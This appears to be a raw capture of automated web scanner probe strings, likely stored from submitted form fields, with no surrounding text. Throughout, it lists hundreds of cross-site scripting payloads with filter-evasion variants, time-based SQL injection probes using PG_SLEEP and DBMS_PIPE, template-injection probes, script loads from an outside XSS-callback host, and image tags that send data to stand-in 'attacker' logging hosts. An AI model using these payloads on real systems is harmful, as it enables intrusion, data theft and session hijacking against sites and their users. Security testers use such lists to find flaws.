555<img/src=">" onerror=alert(9748)>

555-1 OR 210=(SELECT 210 FROM PG_SLEEP(15))--

555

555<ScRiPt >N5bQ(9220)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=oBY9(9891)>

5559339468

555<svg \xa0onload=ufLz(9023)

'"()&%<zzz><ScRiPt >DaC0(9119)</ScRiPt>

dfb{@math key=98991 method="multiply" operand=97996/}xca

<th:t="${dfb}#foreach

555<iframe src='data:text/html

555pBz9y <ScRiPt >NVnD(9858)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%64%49%74%289551%29%3C%2F%73%43%72%69%70%54%3E

555<img src=xyz OnErRor=oBY9(9181)>

bfg5045\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5045

555<ScRiPt >s2NI(9915)</ScRiPt>

<th:t="${dfb}#foreach

555<svg \xa0onload=N5bQ(9273)

5559850094

dfb{{{this}}}xca

555<isindex type=image src=1 onerror=ufLz(9827)>

555

555<WHBWSM>GVVOY[!+!]</WHBWSM>

555<body onload=RyJ5(9345)>

555<img/src=">" onerror=alert(9689)>

bfgx9817\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9817

555<svg \xa0onload=s2NI(9342)

555-1) OR 203=(SELECT 203 FROM PG_SLEEP(15))--

555'"()&%<zzz><ScRiPt >5BZJ(9357)</ScRiPt>

555'"()&%<zzz><ScRiPt >MTSG(9501)</ScRiPt>

555<isindex type=image src=1 onerror=N5bQ(9934)>

555

555\u003CScRiPt\GdIt(9705)\u003C/sCripT\u003E

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=RyJ5(9630)>

555<ifRAme sRc=9973.com></IfRamE>

<%={{={@{#{${dfb}}%>

bfg7775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7775

#{98991*97996*98991*97996}

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%42%59%39%289066%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=s2NI(9200)>

'"()&%<zzz><ScRiPt >MTSG(9227)</ScRiPt>

555<a4rU0UF x=9406>

555<img src=xyz OnErRor=RyJ5(9544)>

'"()&%<zzz><ScRiPt >5BZJ(9612)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555&lt

555

555<iframe src='data:text/html

555<body onload=ufLz(9023)>

555<iframe src='data:text/html

dfb#{xca}=123

555-1)) OR 309=(SELECT 309 FROM PG_SLEEP(15))--

555\u003CScRiPt\oBY9(9884)\u003C/sCripT\u003E

5559096681

bfgx7106\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7106

555

\xf6<img zzz onmouseover=GdIt(91741) //\xf6>

555<img src=//xss.bxss.me/t/dot.gif onload=ufLz(9019)>

dfb{{98991*97996}}xca

555

555<img/src=">" onerror=alert(9290)>

555<img sRc='http://attacker-9559/log.php?

5559214357

555<body onload=N5bQ(9395)>

555<body onload=s2NI(9166)>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=ufLz(9977)>

555Fai6Ercz' OR 186=(SELECT 186 FROM PG_SLEEP(15))--

dfb{{'abcd'.toUpperCase()}}xca

bfg7982\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7982

555&lt

<th:t="${dfb}#foreach

555<input autofocus onfocus=GdIt(9318)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%52%79%4A%35%289404%29%3C%2F%73%43%72%69%70%54%3E

<%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

555<img src=//xss.bxss.me/t/dot.gif onload=s2NI(9200)>

555<img src=//xss.bxss.me/t/dot.gif onload=N5bQ(9231)>

bfg3917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3917

555<aFevs3K<

555<img/src=">" onerror=alert(9130)>

\xf6<img zzz onmouseover=oBY9(97361) //\xf6>

555

<a HrEF=http://xss.bxss.me></a>

bfgx3675\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3675

555\u003CScRiPt\RyJ5(9456)\u003C/sCripT\u003E

555

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=oBY9(9422)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%75%66%4C%7A%289544%29%3C%2F%73%43%72%69%70%54%3E

bfgx6636\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6636

555<img src=xyz OnErRor=N5bQ(9189)>

555<img src=xyz OnErRor=s2NI(9963)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555&lt

555dn76LisB') OR 490=(SELECT 490 FROM PG_SLEEP(15))--

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<%={{={@{#{${dfb}}%>

555<img/src=">" onerror=alert(9338)>

555\u003CScRiPt\ufLz(9386)\u003C/sCripT\u003E

555

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(GdIt(9896))}

dfb{{98991*97996}}xca

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%4E%35%62%51%289072%29%3C%2F%73%43%72%69%70%54%3E

5551Q9J8AlX')) OR 915=(SELECT 915 FROM PG_SLEEP(15))--

555<ScRiPt >30s3(9670)</ScRiPt>

555

\xf6<img zzz onmouseover=RyJ5(97861) //\xf6>

555<img/src=">" onerror=alert(9601)>

555EHXJD <ScRiPt >GdIt(9542)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

555&lt

<th:t="${dfb}#foreach

555<input autofocus onfocus=RyJ5(9045)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%73%32%4E%49%289801%29%3C%2F%73%43%72%69%70%54%3E

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WKD4OS>BPMN2[!+!]</WKD4OS>

555\u003CScRiPt\N5bQ(9791)\u003C/sCripT\u003E

555<ScRiPt >mjoN(9460)</ScRiPt>

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

555

555}body{zzz:Expre/**/SSion(oBY9(9921))}

\xf6<img zzz onmouseover=ufLz(99461) //\xf6>

dfb__${98991*97996}__::.x

555<WGMKXY>P1FY3[!+!]</WGMKXY>

555\u003CScRiPt\s2NI(9326)\u003C/sCripT\u003E

<a HrEF=http://xss.bxss.me></a>

555&lt

555<script>30s3(9117)</script>

555<input autofocus onfocus=ufLz(9271)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ifRAme sRc=9828.com></IfRamE>

dfb__${98991*97996}__::.x

555<WKAXD4>M2KDY[!+!]</WKAXD4>

555

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

\xf6<img zzz onmouseover=N5bQ(91961) //\xf6>

555<script>30s3(9859)</script>9859

555&lt

555'"

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555RdEwb <ScRiPt >oBY9(9134)</ScRiPt>

555<script>mjoN(9162)</script>

555<ScRiPt >hAH8(9958)</ScRiPt>

\xf6<img zzz onmouseover=s2NI(91361) //\xf6>

555<input autofocus onfocus=N5bQ(9967)>

<a HrEF=http://xss.bxss.me></a>

555<aEb2L3u x=9476>

dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\xc0\xa7\xc0\xa2%2527%2522\'\"

555

555<WFN0QV>1FKYJ[!+!]</WFN0QV>

555<script>mjoN(9522)</script>9522

555<ScR<ScRiPt>IpT>30s3(9602)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(RyJ5(9374))}

555<WUXI9E>VGWB8[!+!]</WUXI9E>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

@@28CRD

555<input autofocus onfocus=s2NI(9417)>

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9315/log.php?

555<ScRiPt >9PjQ(9605)</ScRiPt>

dfb[[${98991*97996}]]xca

555<script>hAH8(9347)</script>

555<ScR<ScRiPt>IpT>mjoN(9409)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555

555<ScRiPt >30s3(9294)</ScRiPt>

555rNQ7u <ScRiPt >RyJ5(9453)</ScRiPt>

555<ifRAme sRc=9883.com></IfRamE>

555}body{zzz:Expre/**/SSion(ufLz(9371))}

555<aEi8kCl<

<a HrEF=jaVaScRiPT:>

dfb{{98991*97996}}xca

555<WEXDKT>8DQ0A[!+!]</WEXDKT>

dfb__${98991*97996}__::.x

555<ScRiPt >mjoN(9139)</ScRiPt>

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

555<script>hAH8(9957)</script>9957

555

555e0bBx <ScRiPt >ufLz(9257)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9699></ScRiPt>

555<W2OWSX>NCQYN[!+!]</W2OWSX>

555<aAUdWpF x=9694>

555}body{zzz:Expre/**/SSion(N5bQ(9187))}

555<ScR<ScRiPt>IpT>hAH8(9472)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9968></ScRiPt>

dfb__${98991*97996}__::.x

555<WPDND9>W5KW4[!+!]</WPDND9>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>9PjQ(9051)</script>

dfb[[${98991*97996}]]xca

555'"()&%<zzz><ScRiPt >eirr(9185)</ScRiPt>

555'"()&%<zzz><ScRiPt >fhSZ(9822)</ScRiPt>

555<ifRAme sRc=9939.com></IfRamE>

555<img sRc='http://attacker-9605/log.php?

555NK6Bf <ScRiPt >N5bQ(9094)</ScRiPt>

555<ScRiPt >30s3(9665)</ScRiPt>

555

555<script>9PjQ(9186)</script>9186

555<ScRiPt >DaC0(9482)</ScRiPt>

555<ScRiPt >hAH8(9126)</ScRiPt>

555}body{zzz:Expre/**/SSion(s2NI(9281))}

555<ScRiPt >mjoN(9776)</ScRiPt>

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ifRAme sRc=9549.com></IfRamE>

555<svg \xa0onload=30s3(9010)

'"()&%<zzz><ScRiPt >eirr(9948)</ScRiPt>

555<amIdzH2<

555<adDANCW x=9693>

'"()&%<zzz><ScRiPt >fhSZ(9815)</ScRiPt>

555<WWCEG0>KZFD5[!+!]</WWCEG0>

555<ScR<ScRiPt>IpT>9PjQ(9740)</sCr<ScRiPt>IpT>

555

555ZnVt5 <ScRiPt >s2NI(9531)</ScRiPt>

555<aAdvUMT x=9016>

555<ScRiPt >MTSG(9647)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<isindex type=image src=1 onerror=30s3(9432)>

555<WLY10D>IXEMI[!+!]</WLY10D>

555<svg \xa0onload=mjoN(9082)

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9896></ScRiPt>

555<ifRAme sRc=9802.com></IfRamE>

555<WSSIJW>P2LK3[!+!]</WSSIJW>

555<img sRc='http://attacker-9528/log.php?

5559089434

5559554218

555<ScRiPt >9PjQ(9656)</ScRiPt>

555<W0E8WE>HKPFR[!+!]</W0E8WE>

555<ScRiPt >5BZJ(9877)</ScRiPt>

555<iframe src='data:text/html

555<img sRc='http://attacker-9195/log.php?

555<isindex type=image src=1 onerror=mjoN(9930)>

555<ifRAme sRc=9800.com></IfRamE>

555<ScRiPt >hAH8(9384)</ScRiPt>

555<script>DaC0(9312)</script>

555<aBdIpia x=9510>

bfg4137\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4137

555<iframe src='data:text/html

555<script>MTSG(9500)</script>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9521></ScRiPt>

555<a6KBzId<

555<W3JPLP>GV4CS[!+!]</W3JPLP>

555<aQ34vEY<

bfg7141\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7141

555

555<svg \xa0onload=hAH8(9396)

555<body onload=30s3(9619)>

bfgx1976\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1976

555<aS2LFrl x=9279>

555<img sRc='http://attacker-9509/log.php?

555<body onload=mjoN(9947)>

555

555<script>5BZJ(9047)</script>

555<script>MTSG(9597)</script>9597

555<ScRiPt >9PjQ(9489)</ScRiPt>

555<script>DaC0(9396)</script>9396

555

555<isindex type=image src=1 onerror=hAH8(9755)>

555

555<arZR0t0<

bfgx2830\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2830

<%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9126/log.php?

555<img src=//xss.bxss.me/t/dot.gif onload=30s3(9669)>

555<img src=//xss.bxss.me/t/dot.gif onload=mjoN(9749)>

555<script>5BZJ(9425)</script>9425

555<svg \xa0onload=9PjQ(9053)

555<ScR<ScRiPt>IpT>DaC0(9177)</sCr<ScRiPt>IpT>

555

555

555<ScR<ScRiPt>IpT>5BZJ(9953)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>MTSG(9088)</sCr<ScRiPt>IpT>

<%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555<img src=xyz OnErRor=mjoN(9970)>

555<img src=xyz OnErRor=30s3(9353)>

555<a0h0IlR<

555<isindex type=image src=1 onerror=9PjQ(9685)>

555<ScRiPt >DaC0(9321)</ScRiPt>

555<ScRiPt >5BZJ(9280)</ScRiPt>

<th:t="${dfb}#foreach

555

555<img/src=">" onerror=alert(9841)>

555<ScRiPt >MTSG(9567)</ScRiPt>

555<body onload=hAH8(9761)>

555

555<img/src=">" onerror=alert(9872)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9973></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9193></ScRiPt>

555<iframe src='data:text/html

<th:t="${dfb}#foreach

555

555<img src=//xss.bxss.me/t/dot.gif onload=hAH8(9414)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%33%30%73%33%289218%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9481></ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6D%6A%6F%4E%289466%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=9PjQ(9621)>

555<ScRiPt >DaC0(9857)</ScRiPt>

555<ScRiPt >5BZJ(9996)</ScRiPt>

555

555<img src=xyz OnErRor=hAH8(9690)>

555<img src=//xss.bxss.me/t/dot.gif onload=9PjQ(9077)>

555<svg \xa0onload=5BZJ(9721)

555<svg \xa0onload=DaC0(9764)

555

555\u003CScRiPt\mjoN(9015)\u003C/sCripT\u003E

555<ScRiPt >MTSG(9909)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555\u003CScRiPt\30s3(9472)\u003C/sCripT\u003E

555<img/src=">" onerror=alert(9762)>

555<img src=xyz OnErRor=9PjQ(9457)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=5BZJ(9535)>

555<isindex type=image src=1 onerror=DaC0(9849)>

555&lt

555&lt

555<svg \xa0onload=MTSG(9603)

555'"()&%<zzz><ScRiPt >yNox(9859)</ScRiPt>

555

555<img/src=">" onerror=alert(9650)>

555'"()&%<zzz><ScRiPt >Uvh4(9446)</ScRiPt>

555

555<iframe src='data:text/html

\xf6<img zzz onmouseover=mjoN(97181) //\xf6>

\xf6<img zzz onmouseover=30s3(91371) //\xf6>

%35%35%35%3C%53%63%52%69%50%74%20%3E%68%41%48%38%289659%29%3C%2F%73%43%72%69%70%54%3E

555

555<isindex type=image src=1 onerror=MTSG(9102)>

'"()&%<zzz><ScRiPt >yNox(9600)</ScRiPt>

dfb{{98991*97996}}xca

555<iframe src='data:text/html

555\u003CScRiPt\hAH8(9808)\u003C/sCripT\u003E

555<input autofocus onfocus=30s3(9952)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%50%6A%51%289024%29%3C%2F%73%43%72%69%70%54%3E

'"()&%<zzz><ScRiPt >Uvh4(9120)</ScRiPt>

dfb{{98991*97996}}xca

555<input autofocus onfocus=mjoN(9828)>

555<body onload=DaC0(9462)>

5559883019

dfb[[${98991*97996}]]xca

555<body onload=5BZJ(9515)>

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=DaC0(9058)>

555'"()&%<zzz><ScRiPt >WAav(9447)</ScRiPt>

555&lt

<a HrEF=http://xss.bxss.me></a>

5559911450

dfb[[${98991*97996}]]xca

555\u003CScRiPt\9PjQ(9210)\u003C/sCripT\u003E

555<body onload=MTSG(9668)>

555

555<img src=//xss.bxss.me/t/dot.gif onload=5BZJ(9976)>

dfb__${98991*97996}__::.x

<a HrEF=http://xss.bxss.me></a>

bfg1424\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1424

<a HrEF=jaVaScRiPT:>

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=DaC0(9145)>

bfg5959\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5959

'"()&%<zzz><ScRiPt >WAav(9292)</ScRiPt>

\xf6<img zzz onmouseover=hAH8(98001) //\xf6>

555<img src=//xss.bxss.me/t/dot.gif onload=MTSG(9703)>

<a HrEF=jaVaScRiPT:>

555'"()&%<zzz><ScRiPt >YIXZ(9319)</ScRiPt>

555<img src=xyz OnErRor=5BZJ(9705)>

555&lt

5559377395

555<input autofocus onfocus=hAH8(9591)>

555<img/src=">" onerror=alert(9161)>

bfgx8963\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8963

555<img src=xyz OnErRor=MTSG(9733)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx9231\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9231

555}body{zzz:Expre/**/SSion(30s3(9717))}

'"()&%<zzz><ScRiPt >YIXZ(9522)</ScRiPt>

555<img/src=">" onerror=alert(9043)>

<%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

555KziQF <ScRiPt >30s3(9507)</ScRiPt>

bfg2696\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2696

5559980155

555<ScRiPt >fhSZ(9040)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<img/src=">" onerror=alert(9686)>

555<ScRiPt >eirr(9543)</ScRiPt>

\xf6<img zzz onmouseover=9PjQ(99461) //\xf6>

555}body{zzz:Expre/**/SSion(mjoN(9345))}

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%61%43%30%289570%29%3C%2F%73%43%72%69%70%54%3E

555

555

bfgx7925\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7925

555YqkkX <ScRiPt >mjoN(9243)</ScRiPt>

<a HrEF=jaVaScRiPT:>

%35%35%35%3C%53%63%52%69%50%74%20%3E%35%42%5A%4A%289886%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%54%53%47%289144%29%3C%2F%73%43%72%69%70%54%3E

bfg2286\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2286

<th:t="${dfb}#foreach

555<WO5MBY>8BINE[!+!]</WO5MBY>

555<WGU2VY>4PKBL[!+!]</WGU2VY>

555\u003CScRiPt\DaC0(9538)\u003C/sCripT\u003E

555<input autofocus onfocus=9PjQ(9939)>

555<WEW9XE>WB6DS[!+!]</WEW9XE>

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\MTSG(9688)\u003C/sCripT\u003E

<th:t="${dfb}#foreach

555<WOKEAG>LHRBQ[!+!]</WOKEAG>

555\u003CScRiPt\5BZJ(9227)\u003C/sCripT\u003E

555}body{zzz:Expre/**/SSion(hAH8(9546))}

555

<a HrEF=http://xss.bxss.me></a>

555<ifRAme sRc=9215.com></IfRamE>

555<script>fhSZ(9581)</script>

bfgx2193\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2193

555&lt

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<script>eirr(9500)</script>

555&lt

555&lt

555

555kQcgy <ScRiPt >hAH8(9504)</ScRiPt>

555<ifRAme sRc=9224.com></IfRamE>

555

555<script>fhSZ(9427)</script>9427

555<aQaPprP x=9131>

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=5BZJ(91261) //\xf6>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<acvcN9x x=9582>

555<WOKSEC>IDCXJ[!+!]</WOKSEC>

555<script>eirr(9135)</script>9135

\xf6<img zzz onmouseover=DaC0(99601) //\xf6>

\xf6<img zzz onmouseover=MTSG(99431) //\xf6>

555

<%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9280/log.php?

555}body{zzz:Expre/**/SSion(9PjQ(9461))}

555<input autofocus onfocus=5BZJ(9482)>

555<img sRc='http://attacker-9407/log.php?

555

555<ScR<ScRiPt>IpT>fhSZ(9593)</sCr<ScRiPt>IpT>

555

555<ScR<ScRiPt>IpT>eirr(9169)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

555

<th:t="${dfb}#foreach

555<ifRAme sRc=9441.com></IfRamE>

555<aT2NbDY<

555<input autofocus onfocus=DaC0(9095)>

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

5550GPBm <ScRiPt >9PjQ(9985)</ScRiPt>

555<input autofocus onfocus=MTSG(9081)>

555<atZZn8Z<

555<ScRiPt >eirr(9179)</ScRiPt>

555<ScRiPt >fhSZ(9899)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<aNALbq0 x=9679>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

555<WZBAUE>RSNV0[!+!]</WZBAUE>

<a HrEF=http://xss.bxss.me></a>

dfb__${98991*97996}__::.x

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9466></ScRiPt>

dfb[[${98991*97996}]]xca

555<img sRc='http://attacker-9168/log.php?

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9045></ScRiPt>

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(5BZJ(9982))}

<a HrEF=jaVaScRiPT:>

555<ScRiPt >eirr(9696)</ScRiPt>

555<ifRAme sRc=9334.com></IfRamE>

555<ScRiPt >fhSZ(9889)</ScRiPt>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<ScRiPt >Uvh4(9266)</ScRiPt>

555}body{zzz:Expre/**/SSion(DaC0(9077))}

555<svg \xa0onload=eirr(9585)

dfb[[${98991*97996}]]xca

555<ax3lo4t<

dfb[[${98991*97996}]]xca

555}body{zzz:Expre/**/SSion(MTSG(9806))}

555<akZzgjP x=9880>

555<svg \xa0onload=fhSZ(9194)

555

555<WUZL1J>F3U4W[!+!]</WUZL1J>

555XZBP0 <ScRiPt >5BZJ(9657)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<isindex type=image src=1 onerror=eirr(9109)>

dfb__${98991*97996}__::.x

555<WM4EGZ>NB6M3[!+!]</WM4EGZ>

555JV6qY <ScRiPt >MTSG(9852)</ScRiPt>

555<script>Uvh4(9622)</script>

555<img sRc='http://attacker-9745/log.php?

dfb__${98991*97996}__::.x

555QBtK0 <ScRiPt >DaC0(9893)</ScRiPt>

555<isindex type=image src=1 onerror=fhSZ(9786)>

555<iframe src='data:text/html

555<ScRiPt >yNox(9371)</ScRiPt>

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<WXTMM0>ECH2V[!+!]</WXTMM0>

555<ifRAme sRc=9932.com></IfRamE>

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<W31B7W>1ARPN[!+!]</W31B7W>

555<script>Uvh4(9595)</script>9595

555<a44pyLE<

555<ScRiPt >YIXZ(9442)</ScRiPt>

555<WUUKDY>HUDSW[!+!]</WUUKDY>

555<iframe src='data:text/html

555

555<ifRAme sRc=9737.com></IfRamE>

555

555<WU9INW>WHCST[!+!]</WU9INW>

555<script>yNox(9157)</script>

555<body onload=eirr(9784)>

555<ifRAme sRc=9178.com></IfRamE>

555<ScRiPt >WAav(9512)</ScRiPt>

555<awIBu2B x=9042>

555<ScR<ScRiPt>IpT>Uvh4(9541)</sCr<ScRiPt>IpT>

555<script>yNox(9342)</script>9342

555<img src=//xss.bxss.me/t/dot.gif onload=eirr(9909)>

555<script>YIXZ(9239)</script>

555<img sRc='http://attacker-9996/log.php?

555<WIZTHV>ATWQE[!+!]</WIZTHV>

555<adcriQ0 x=9129>

555<anuzmKB x=9533>

555<body onload=fhSZ(9134)>

555<ScRiPt >Uvh4(9476)</ScRiPt>

555<img src=xyz OnErRor=eirr(9412)>

555<ScR<ScRiPt>IpT>yNox(9942)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9696/log.php?

555<img sRc='http://attacker-9260/log.php?

555<img src=//xss.bxss.me/t/dot.gif onload=fhSZ(9508)>

555<img/src=">" onerror=alert(9974)>

555<aMBAUqe<

555<script>WAav(9820)</script>

555<ScRiPt >yNox(9460)</ScRiPt>

555<script>YIXZ(9393)</script>9393

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9346></ScRiPt>

555<script>WAav(9607)</script>9607

555<aESruhG<

555<ScRiPt >Uvh4(9496)</ScRiPt>

555<img src=xyz OnErRor=fhSZ(9502)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%65%69%72%72%289620%29%3C%2F%73%43%72%69%70%54%3E

555<aEFEqUx<

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9673></ScRiPt>

555<ScR<ScRiPt>IpT>YIXZ(9876)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>WAav(9490)</sCr<ScRiPt>IpT>

555<ScRiPt >yNox(9494)</ScRiPt>

555\u003CScRiPt\eirr(9861)\u003C/sCripT\u003E

555<svg \xa0onload=Uvh4(9103)

555<ScRiPt >YIXZ(9724)</ScRiPt>

555<ScRiPt >WAav(9913)</ScRiPt>

555<img/src=">" onerror=alert(9104)>

555<svg \xa0onload=yNox(9823)

555&lt

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9988></ScRiPt>

555<isindex type=image src=1 onerror=yNox(9663)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%66%68%53%5A%289213%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=Uvh4(9731)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9906></ScRiPt>

\xf6<img zzz onmouseover=eirr(97921) //\xf6>

555<ScRiPt >YIXZ(9203)</ScRiPt>

555<iframe src='data:text/html

555<iframe src='data:text/html

555<svg \xa0onload=YIXZ(9459)

555<ScRiPt >WAav(9716)</ScRiPt>

555<input autofocus onfocus=eirr(9829)>

555\u003CScRiPt\fhSZ(9671)\u003C/sCripT\u003E

555<body onload=yNox(9254)>

555<body onload=Uvh4(9258)>

555&lt

555<svg \xa0onload=WAav(9005)

555<isindex type=image src=1 onerror=YIXZ(9697)>

<a HrEF=http://xss.bxss.me></a>

555<img src=//xss.bxss.me/t/dot.gif onload=yNox(9640)>

555<img src=//xss.bxss.me/t/dot.gif onload=Uvh4(9321)>

555<isindex type=image src=1 onerror=WAav(9790)>

\xf6<img zzz onmouseover=fhSZ(98861) //\xf6>

555<iframe src='data:text/html

555<iframe src='data:text/html

555<img src=xyz OnErRor=Uvh4(9896)>

<a HrEF=jaVaScRiPT:>

555<body onload=YIXZ(9732)>

555<img src=xyz OnErRor=yNox(9220)>

555<input autofocus onfocus=fhSZ(9883)>

555}body{zzz:Expre/**/SSion(eirr(9193))}

555<body onload=WAav(9737)>

555<img/src=">" onerror=alert(9322)>

555<img src=//xss.bxss.me/t/dot.gif onload=YIXZ(9592)>

555<img/src=">" onerror=alert(9642)>

555<img src=//xss.bxss.me/t/dot.gif onload=WAav(9286)>

<a HrEF=http://xss.bxss.me></a>

55545KIn <ScRiPt >eirr(9365)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%79%4E%6F%78%289131%29%3C%2F%73%43%72%69%70%54%3E

555<img src=xyz OnErRor=YIXZ(9401)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%55%76%68%34%289572%29%3C%2F%73%43%72%69%70%54%3E

<a HrEF=jaVaScRiPT:>

555<WFQTSF>MEMGA[!+!]</WFQTSF>

555<img src=xyz OnErRor=WAav(9591)>

555\u003CScRiPt\yNox(9879)\u003C/sCripT\u003E

555<img/src=">" onerror=alert(9898)>

555'"()&%<zzz><ScRiPt >50b0(9092)</ScRiPt>

555\u003CScRiPt\Uvh4(9188)\u003C/sCripT\u003E

555<ifRAme sRc=9034.com></IfRamE>

